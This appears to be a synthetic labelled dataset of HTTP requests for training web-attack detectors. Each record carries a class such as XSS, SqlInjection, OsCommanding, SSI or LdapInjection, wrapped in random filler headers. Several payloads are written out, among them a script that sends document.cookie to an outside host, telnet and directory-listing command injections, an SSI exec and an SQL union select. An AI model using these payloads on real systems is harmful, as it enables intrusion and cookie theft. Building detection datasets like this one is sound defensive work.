Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Feb 05 03:01:10 GMT
Host: 191.53.66.26
Connection: keep-alive
Accept: text/*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: max-stale=999
Cookie: fAe5otNwijnta=390748;SWw_LX9P8I=[cNifE[zlRg;rrm3dANhhthsu=)(|(displayName=had*) (name=    had*    )(   mail=had*  );iI=xbe>2
Cookie2: $Version="61"
Date: Wed, 07 May 08 05:49:33 UTC
ETag: "fUp70bXX00.8Am_m"
From: sfoi@uYHnhWa.fr
If-Unmodified-Since: Mon, 11 Feb 08 17:30:54 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 8428
MIME-Version: 3.4
Pragma: te='4'
Proxy-Authorization: Digest nonce
Authorization: NTLM dndNb2VyV2V3cGVnNlJvZW53ZTRlTmRuNHRvbWU1bHJ0ZFc5b2hnbw==
Referer: http://www.Teqbp.it/2tdxy/rbehs/aueen.dll
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 2.5; gc-wt; rv:5.8.2) Gecko/14927641
UA-OS: Windows 98
UA-Pixels: 6183x807
Via: HTTP/7.9 www.iyaf.gif:26233
Transfer-Encoding: identity
X-Forwarded-For: 93.67.165.109
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

mlsro6=9chaving&reNly=u1PHkx5PpRYt&dOsqZao3ahsoua=0Dugp@qXmCGp

End - Id: 37301
Start - Id: 47327
class: XSS
GET /i8B.fhxgsSG.mdb?apestoOaaltzan=%3Cbgsound+src++%3D++%22++++javascript%3A++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ndiech.com%2Fcgi-bin%2Finmarant.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E&atnde1lmisa=4&rnt=74430&dn1pg3dss=C%40a+ HTTP/1.1
Host: 163.31.74.66
Connection: close
Accept: audio/*, image/*, video/mpeg;q=0.9
Accept-Charset: euc-kr;q=0.5, cp-936;q=0.6, euc-jp;q=0.0, windows-1250, cp-936;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 68.164.101.129
Cookie: teostnoeze=tehs;qyKz=68667084;ieidadz=lras;twhoc6=tfrm9pnais
Cookie2: $Version="4"
Date: Mon, 08 May 06 09:00:13 CET
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: ueasrS@d1jogree.it
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: *
If-None-Match: *
If-Range: "SH6cwk7Ohr@yOQp"
Max-Forwards: 1125
MIME-Version: 3.5
Pragma: lgEt61='ea'
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic NmJob1dyOnZlZXN0
Range: -827060,69-,229-399617
Referer: /o3eho/nsivl.swf
TE: trailers,chunked;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 0.9; jt-ex; rv:6.0.9) Gecko/42108119
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6004x311
Via: FTP/0.4 243.52.213.208, ewo/8.5 www.aosetyt.html
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 254.218.8.107
X-Serial-Number: 126620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47327
Start - Id: 44446
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.2VOlfg.it
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2, ks_c_5601-1987;q=0.2, x-mac-arabic;q=0.9, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 74.63.3.85
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Sun, 21 Mar 10 01:19:23 CET
ETag: W/"FP76Uf4Vrb4BtBS"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Tue, 29 Nov 05 15:57:27 UTC
If-Unmodified-Since: Tue, 16 Jan 07 23:50:46 CET
If-Match: *
If-None-Match: ".hhTg4UUv.2jgebY"
If-Range: Mon, 08 Nov 04 08:50:39 UTC
Max-Forwards: 40
MIME-Version: 6.3
Pragma: Srea='efh'
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: http://www.tb5f.cz/Tlenir/ufmoi/wf7eiT/tahwrxl.ace
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 9.3; nA-Ss; rv:4.4.6) Gecko/96401651
UA-CPU: Sparc
UA-Disp: 983,472,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: FTP/4.4 231.44.23.23
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 0.187.253.54
X-Serial-Number: 45781122630812126119
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44446
Start - Id: 44699
class: PathTransversal
POST /NvtdL0Ynai3/o.O75_/l9ocmdu2sh/rZiphNNjRPKJ37M-k_/jv1L/is5h6raemebya/sV_cvDOPIP@efQ/dbeah/oedti.dll? HTTP/1.0
Content-Length: 198
Content-Language: 9bo
Content-Encoding: compress
Content-Location: /c4wc4tf.asp
Content-MD5: bFVuaG5sc2N0c2xvZHNybg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Sep 06 06:10:41 UTC
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: www.joeRo.fr
Connection: close
Accept: application/rtf, image/gif;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: ooNlr-eret;q=0.9, eane-nXistbr, t9ns-wv, ni-btrLa;q=0.8
Cache-Control: max-stale
Client-ip: 159.172.8.1
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Wed, 26 Jul 06 20:24:46 UTC
ETag: W/"J8-xNtKg_EqXjlggwFK"
Expect: 100-continue
From: Eu9rraC@rmprTar.net
If-Modified-Since: Sat, 27 Feb 10 20:18:52 UTC
If-Unmodified-Since: Fri, 09 Jan 04 03:21:00 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 5
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: eaky9 2btAl=hHSdo1yo
Range: 2168-,8-1607,73-
Referer: http://uwu7.org/enagt/Afa2o9i.sh
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: xncesseHieeat
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2309x0531
Via: 8.9 193.116.9.112
Transfer-Encoding: compress
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 145776
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

nekouw5=arIg&orooroteb7nb=n9e&th2w1w0ethbi=uRonG&ct0e=lz6d&st6Maysenire=xin&E9agOw=doc( file:///c:/ce1i/lTla.xml     )&drop6window.openspb2Vl1=nG8KF&nrtheomfdjmy=tsnvstiodebd0EYiut

End - Id: 44699
Start - Id: 43553
class: OsCommanding
GET /i0bnohk/eQxu@R34en.wu7CF_E/ScR.@KkLO2-W/lnNR7.gif?wwVAgg=cMGfC-J6&6cau=912199&tsgo1ruSue=ls++-las+++%2Fhome%2F+%7C&xe=%3Cuscript+eY&mdae=eenejitlnpet7 HTTP/1.0
Host: www.nnbshhsy.biz
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 68hmedhs-eiJ, ef7naid-aiahff;q=0.6, ar-Er9iuh;q=0.8
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: ro2a05tejMk=iR;we2=ya0enAef7awsfSe;me=a1EmNmeestaaS;nn0=33347;dVnEvH54NI8=eoaoeAtsideolmee
Cookie2: $Version="425"
Date: Sun, 25 Mar 07 08:48:12 UTC
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Fri, 29 Jul 05 08:43:10 GMT
If-Unmodified-Since: Sun, 20 Apr 08 06:36:28 GMT
If-Match: *
If-None-Match: "0o@td3910LiAdDqVZWwA"
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 29
MIME-Version: 7.0
Pragma: SRbdEojh='dtoobay'
Proxy-Authorization: NTLM YmxvNHRwYW5pdHhhdTNhaGhpY3R0ZGg5c2luUm5kczVlZElzYWE=
Authorization: Digest username="eup1n"
Range: 510-
Referer: /otlwc9lc/edln.swf
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: eomcdnph/7.8.7
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 1.0 www.AntEao.html:48
Transfer-Encoding: gzip
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43553
Start - Id: 40132
class: SSI
GET /7aEEQobject/TES/nzv-BTMsvO9PHIRa8/yRgPkA7Z/e74/6tenad.png?ig=5884887612&sUQ3OHNiframeR=u%3Chomeinsert%2B+cot&nCD24@AINx=%3C%21--+++%23exec+cmd%3D%22%2Fbin%2Fls++++-l++%2Fhome%2Fe6ij%2Fmpfgtiicd%22++--%3E&pbQhoeclhrad=417636&tvbonipewetut=Aadminb6Atdf%27ry&ccBhdte0gle8=k2Dup2o6&podoofsaMeeEe=6189132&P.Jkfx3X=o+ianaccept%25ntwhereeh8aRhiframe7t HTTP/1.1
Host: www.yMypke.com
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 246.182.239.2
Cookie: fECcNaVMDB=hmiz3:Ffbinnta;gstabore=62
Cookie2: $Version="8"
Date: Fri, 27 Aug 04 12:02:23 UTC
ETag: "tz3ydL4nfTVnuO2VSMsG"
From: PtrtE@h2sisrnd.gov
If-Modified-Since: Wed, 06 Oct 04 09:11:06 CET
If-Unmodified-Since: Tue, 14 Feb 06 14:50:34 CET
If-Match: *
If-None-Match: "epZvrM3VuYc5TvvgPQQC"
If-Range: Fri, 25 Jan 08 22:03:58 CET
Max-Forwards: 2943
MIME-Version: 8.1
Pragma: vk=ioaa
Proxy-Authorization: Basic b290UzpiY3R6
Authorization: 51Ar 5shchs=xydnaakN
Range: 86-29827,480182-539278,773981-8539
Referer: http://www.huhm7bn.fr/SSrEo.mp3
TE: chunked;q=0.7,chunked;q=0.4,trailers
User-Agent: notyadn/8.4.3.5
UA-Disp: 5908,939,32
UA-Color: color32
Transfer-Encoding: identity
Warning: 305 53.141.60.13 "ymreiTeeg1dos2e" "Sun, 14 Oct 07 07:03:33 CET"
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40132
Start - Id: 42735
class: SqlInjection
POST /e5Porfj5atnepm7sice2/oLewunzousttseb71ag/2Tv/r4Mftp/rrechePms4oht/tZmh/WYeNa0qw4netcat/espi1ursomSSk0ty/3RFf6_nL-y.php3? HTTP/1.0
Content-Length: 31
Content-Language: hp,i
Content-Encoding: gzip
Content-Location: http://www.hee3iS7.it/x55BL.zip
Content-MD5: dG9hc2VjejhldGkxZW5udA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Dec 06 13:43:54 UTC
Last-Modified: Mon, 30 Oct 06 19:59:16 GMT
Host: 100.40.103.133
Connection: baCu
Accept: video/quicktime, audio/basic;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: asnourmt-ftsm6, odtt-En, T-swutnci;q=0.6, aue-8;q=0.1
Cache-Control: only-if-cached
Client-ip: 57.72.9.173
Cookie: RT3H=;    exec get_cust( 'x''     union  select     object_name,object_type,''x''     from   user_objects  where   ''tshrmyr''  =    ''    ' );
Cookie2: $Version="0"
Date: Wed, 13 Apr 05 14:29:45 CET
ETag: W/"D6SYDo5YCkMgqXZPzEv"
From: lnd9clwh@rteetb.st
If-Modified-Since: Mon, 06 Dec 04 23:47:42 GMT
If-Match: *
If-None-Match: "JB5w4EhpuSBF5-B2nE"
Max-Forwards: 8794
MIME-Version: 0.6
Authorization: NTLM ZHZyZG5vY1R0dGFuYWVtaWdRZW1lenpkb3d0cGduT2ZyNg==
Referer: /Mhile/R1ht.nsf
TE: trailers
User-Agent: ddorrl (uFrY22vK; o4G_yCzVLG; heu9vW)
UA-CPU: x86
UA-Disp: 257,411,8
UA-Color: color8
Via: 4.4 249.4.67.209, 4.3 www.FiHc3nl.htm
Transfer-Encoding: deflate
Upgrade: wio/7.9, nnng/7.1, s21rm/9.9, ondtA/4.0

vmbr=hri1exSd sal&igimslp=88663

End - Id: 42735
Start - Id: 39071
class: LdapInjection
POST /sre/AP.FWk/eTT/Dunionbgsound0V7Flink8zmAS/n4fzxW.W2.pl? HTTP/1.1
Content-Length: 140
Content-Language: se,ereafxqg
Content-Encoding: identity
Content-Location: http://sa66ri.org/tilatgW/r4Mcmci.cgi
Content-MD5: bTltaW9lcmVsYUN0aHRxcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Feb 09 15:28:08 GMT
Last-Modified: Fri, 13 Apr 07 23:22:39 GMT
Host: 165.24.179.23
Connection: keep-alive
Accept: video/mpeg;q=0.5, text/*;q=0.3, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ti-nnz92
Cache-Control: CeuzaB='da'
Client-ip: 94.224.234.137
Cookie: tzaalznlrfra9o=)   ( |    (sjau=nbe*);s8gtbteere=3udo elapsh;hsei=+dm;Nvo0nddgart36=ni;IkBKf=eO es8sock_streamdyldni
Cookie2: $Version="57"
Date: Tue, 16 Jan 07 23:47:20 GMT
ETag: W/"yvzX9iqgrv6V52Mvwhh"
Expect: 100-continue
From: leml@092ceIht4.ch
If-Modified-Since: Fri, 02 Jul 04 11:35:27 GMT
If-Unmodified-Since: Mon, 29 Dec 08 11:39:09 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Aug 09 06:13:09 GMT
Max-Forwards: 794
MIME-Version: 8.7
Pragma: tfddt='e'
Proxy-Authorization: lNhoeo Ledoo=fcneqdga
Authorization: Digest algorithm=eEOrol
Range: -798,89211-,080300-12
Referer: http://h3hIl.gov/d3SxstgH/ozOta/heWeOcw/lroi/bdbe5vit.nsf
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/9.7 (compatible; Konqueror/5.1; WinNT; 51snr7; E7hmnh3)
UA-CPU: 68000
UA-Disp: 5522,0953,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 427x4997
Via: eEoel/6.4 194.119.68.245, f4o/2.8 51.135.146.223
Transfer-Encoding: identity
Upgrade: oe8sa5/3.6, asot/7.7, vIoul/0.4, Oitiff/6.5
Warning: 409 www.nfofe.html "eeMcrdphcDeina" "Sat, 18 Nov 06 09:11:30 UTC"
X-Forwarded-For: 35.165.196.147
X-Serial-Number: 53018392304378
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ISs=era%z&1h5du=0mb%@dt>&sct=iaII&MxoscriptTarmadminperlkV=a&aedeodrhqtua4p=iJenh&e1rhtalvasdsek5=trr&aelorgoft=42960685&rne=2813332

End - Id: 39071
Start - Id: 43102
class: OsCommanding
GET /g8Rpce9vapd.sh?rbsepe7nrferlN=isdrop%40childHka+%7C0hrelsso&92notOs=%22+%3B+++++telnet++++72.158.60.170++80+++++%3B&yiOdo5estelrebj=Lhsr%3BiescriptS HTTP/1.0
Host: www.alo4se6n.org
Connection: teNs
Accept: video/*, image/*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, compress
Accept-Language: tyehiAed-ee, Ye-dfoe9rxZ, ErsriwMd-ntdIuet, mchjegi-ZcqiA89i, ah-5;q=0.7
Cache-Control: max-stale
Client-ip: 160.22.241.142
Cookie: oey3efl9rrsN=201
Cookie2: $Version="3"
Date: Sun, 11 Jan 09 20:17:41 CET
ETag: W/"XZEbfacun@a_9@4"
From: qEgfHnmn@tsw5sAas.biz
If-Modified-Since: Sat, 17 Feb 07 20:05:08 CET
If-Unmodified-Since: Tue, 03 Feb 04 18:28:18 GMT
If-Match: *
If-None-Match: *
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 66
MIME-Version: 6.4
Pragma: utogitrL=s
Proxy-Authorization: NTLM OXpyZ29vZW1ubnlmbzhlZXV1Y2tyaHN0ZGF4ODFuYmFhZHRr
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /ioWh6/ipf9xed/dyrepos/ohiOrA6.bin
TE: deflate
Trailer: If-Modified-Since
User-Agent: tebi (mGE3Bx; i4t5btsj; ehUqw0@O)
UA-Disp: 046,4473,8
UA-OS: Solaris
UA-Pixels: 2923x7442
Via: 4.4 113.146.55.131, FTP/8.5 www.DytMl98c.shtml
Transfer-Encoding: identity
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Serial-Number: 306986025864028
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43102
Start - Id: 44939
class: PathTransversal
GET /8t/hOWda-bH/oNmtawW/yiAi_fVrZA0eJPINCX/pgV-y/ga6efse/EpassthruIswfaKG2fkS/irdepeOehaispn/qTD4_1qFcYUz0Z/9-_servicesEuVqi5/bupca8wCDe9.wUmw/sXN.css?MJK@rA4wBkLW=acceptymYasosA%3Ferqlr&z4eealmad=o2p6ke&Nf=9780&oR9CfIw4=orO&oLy78retcn=+oaccess_log&Asey3yWlA7=fAN41uh1j&beiurst=ee%3D%2Frqwn9Rhh&llaas=xyeEqzze&oyoo5pot=016964&TenepsIheeiwh=0&KWwE77whwCB=3790&zOefm=file%3A%2F%2F%2Ft%3A%2Fofei%2Fborc%2FeeusezA.xml HTTP/1.1
Host: 182.248.164.64
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-roman
Accept-Encoding: 
Accept-Language: kedH-I;q=0.8, dar-1nTh, st-nTso;q=0.5
Cache-Control: no-transform
Client-ip: 205.151.162.96
Cookie: co=ecus;Y3httpsA=tXhtopcr\stdin3;nmup=eafe
Cookie2: $Version="19"
Date: Thu, 20 Apr 06 13:46:48 CET
ETag: W/"FTabip4q-bvxfAK_"
Expect: El7seo=rAoiW;yh7itv=latecp
From: Tnis@tashwes0i.st
If-Modified-Since: Mon, 25 Sep 06 13:36:58 CET
If-Unmodified-Since: Thu, 27 Apr 06 11:12:22 GMT
If-Match: "V@NlObOh6h9Xa1D"
If-None-Match: *
If-Range: Mon, 10 May 04 05:39:10 UTC
Max-Forwards: 6
MIME-Version: 8.4
Pragma: nmaynthe=enrHlq
Proxy-Authorization: NTLM aGExY2ZuZ2h5ZXN0YWVoamkwNjR4c0FxdG96eGh0cmVpcGVjdGVzbmV5ZW1hbg==
Authorization: iaweD nleptOe=4ijclSgY
Range: 032407-30
Referer: http://zosen.st/Ustdass/edthyi/cxtenfmh/awtfqtr.fgf
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.7 (compatible; Konqueror/4.5; Unix; oknth; t9ixs)
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2762x370
Via: 9.2 199.10.123.110, 9.5 www.utnrimsp.htm:45194, HTTP/6.1 www.mTncihro.js
Transfer-Encoding: deflate
Upgrade: stntow/3.4, 4egw/7.2
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44939
Start - Id: 48469
class: XPathInjection
GET /0vkE2m.eS.jpg?uenzetus1=gfnaAeote&EZGcmdfm=c%2B&nRhDoecho91itelnetyI=tYNDLTmZtj&anf8tuia=5 HTTP/1.1
Host: www.yseoi.net
Connection: nhanea
Accept: image/gif;q=0.1, text/*;q=0.7, application/zip;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: s-nlEhdsq;q=0.8, lHn1u-nae, tn-rtt
Cache-Control: no-cache
Client-ip: 193.145.9.182
Cookie: a40wqgixItu0u=6520735;hi=tppeua/sc/one/child::node()[position()=61]    or  'qasd' =  ';aYaalzfdBaHu=atw9eueea03owemm;9PQprocessing-instructionHt=fA8$;w8ikowl1ksoiDy=0ateiCaSakTbon8CT;services9b.9x=4985
Cookie2: $Version="1"
Date: Thu, 01 Feb 07 13:54:50 CET
ETag: W/"FKKTnXS@BEreAWkUH-iT"
Expect: 100-continue
From: duez@roBpoamoii.uk
If-Modified-Since: Sat, 11 Aug 07 09:00:49 CET
If-Unmodified-Since: Wed, 03 Mar 04 14:16:08 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Apr 04 15:49:11 UTC
Max-Forwards: 703
Pragma: pmn=t0rfg
Proxy-Authorization: 7vto beGCh6=td7mup
Authorization: Digest nonce
Range: -8,000319-4,-57
Referer: /eeiot/lsi3ae.asmx
TE: chunked,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.3 (compatible; Konqueror/4.7; Mac OS X; h9eah; vyhtOo)
UA-CPU: Sparc
UA-Disp: 4596,7427,16
UA-Color: color8
Via: dl3/3.9 93.178.237.134, 9.5 www.sjRnzn.htm
Transfer-Encoding: gzip
Upgrade: eeet1/3.4, has/9.2, C8nt2/1.3, wNsh/5.4
Warning: 216 www.neaatkhh.jpeg:6 "hacliae" 
X-Serial-Number: 60467521583413658
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48469
Start - Id: 49088
class: XPathInjection
GET /efrwa6ganoeoa7ipuwiu/c1esOjRCESqn-DS7J/DLDx0ZLHlikexlpM/aisetote3elr3he/tkSD-QHGDer9.php?Hnuct=tah&ecg9h=63012008&BopthVXAgW=ostmpi+n%24%3E6&Qhatrnri=mCE&WuzlTh4lusa=te8It%2FigneCi%2FTsxrr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D066%5D+++++or++%27ock2ch%27+++%3D++%27&_@oR9EcWxlinkQ=2iJih&etXoihr=s2HvZ&rhzrporhuW=86stidriA%3B%24p%40&ZjUxLG8W1fsam=lem+&seiab=lt%3Fe&ZrXdeleteX2=zpositiondhe&ll8nW=e4p2hd&Fgedn4iawonvui=wh HTTP/1.1
Host: www.qsidle.biz:8593
Connection: close
Accept: application/*, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 43.219.255.27
Cookie: oe5lktaHmut=ol;wikqinuaAn7r=yWhhJUw-7B
Cookie2: $Version="21"
Date: Mon, 07 Apr 08 13:35:45 GMT
ETag: "9zbdhmHRPBJn6NucEb"
Expect: uotniqud=2tuam1Po;Hd2ei
From: eynba@e3yzoc.com
If-Modified-Since: Fri, 16 Feb 07 09:36:27 CET
If-Unmodified-Since: Wed, 19 Sep 07 08:41:47 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Feb 09 19:08:52 GMT
Max-Forwards: 0
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: TxKj ysmsznno=icasui
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: /fhMo/awehpl/emoeaoa/eaNcze.rar
TE: deflate;q=0.9,chunked;q=0.7
Trailer: Upgrade
User-Agent: snyeodniit (irpC.Xw; qInLE4.WLA)
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: nut/9.8 193.223.151.10:98059
Transfer-Encoding: deflate
Upgrade: mtodno/2.6
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49088
Start - Id: 37768
class: LdapInjection
GET /e0b/nioo9dkimth/3YR022PID/oW3U/rN5neuavI/IDn8hx/ox6FL_UY8tqaYF-/uK.jpeg?hygltaeesW=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&narQ2=qhsDlib&iosfjmfa43ri=sscript9wieragr6%3Astecxnc HTTP/1.0
Host: www.loxnv2r.gov:2
Connection: ztRegt4d
Accept: application/x-tar;q=0.6
Accept-Charset: euc-cn;q=0.4, iso-8859-1;q=0.6
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 96.50.88.195
Cookie: ncarweeess=65
Cookie2: $Version="37"
Date: Wed, 07 Jan 04 03:47:00 CET
ETag: "obHqz4OzX93Svrt6nEXA"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Wed, 16 Feb 05 09:51:41 UTC
If-Unmodified-Since: Sun, 19 Jul 09 08:33:55 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Aug 06 17:13:24 CET
Max-Forwards: 638
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 059-52057,02-0322
Referer: /sitrytRn/seARir4m/arwtnscm/Eutdp.msf
TE: deflate,trailers
Trailer: TE
User-Agent: rhmopehhhRlTnresh
UA-CPU: x86
UA-Disp: 3072,0786,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: FTP/2.5 253.194.176.145, medtr/3.5 115.210.243.25
Transfer-Encoding: In2ie
Upgrade: Ebsle/5.6, dvNtn/8.8, on3/2.1, sae/8.5
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 37768
Start - Id: 46810
class: XSS
POST /nuvS_FJ82_f-Tb/eo-/kPsamBOr4bN6/5iqzeOa6s_QOf/muRj.jo5/biedereh/tWW@-pLul/EiscgzhtmeAjoitC5axs/ykAcr-Nu/o6uheGa/n6/tQY8yv0loGWYClKlqt.nsf? HTTP/1.1
Content-Length: 399
Content-Language: secg
Content-Encoding: gzip
Content-Location: http://www.spaas5a.net/A308c6/htr7fs/detlists.mp3
Content-MD5: Y3Q4c201cFJlemQ4bGMwdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Mar 06 19:14:33 CET
Last-Modified: Wed, 21 Dec 05 20:04:04 GMT
Host: www.stvtife3e.de
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 180.151.251.196
Cookie: AEXw4s=8164402844;hnuihYsuelt=ytcownab;HzNethleal=s?iasEoewinntSmperlf ;agr7=ou5a
Cookie2: $Version="66"
Date: Sat, 11 Sep 04 16:02:27 GMT
ETag: "y@tKjzaOGXeONi4MFD"
Expect: crttsci=ei2cr
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Sat, 07 Apr 07 11:09:37 UTC
If-Unmodified-Since: Tue, 30 Mar 10 02:18:52 UTC
If-Match: "IivuB7J5hPJGPwFpQvxu"
If-None-Match: "G45FC028of2eqx3ST.I"
If-Range: Tue, 04 Jan 05 02:15:48 UTC
Max-Forwards: 1871
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: NTLM ZXJkRWV0MmJod0Jmcm9pc3JzMUZuMWg1c2VsMm5mZWh4ZWFvdnU=
Range: 175390-78,55-,908690-
Referer: /aylefS/4tdl/1oONejh.pdf
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: np4eiesre/9.5.1.0.0
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.3 www.anzI.shtml
Transfer-Encoding: identity
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
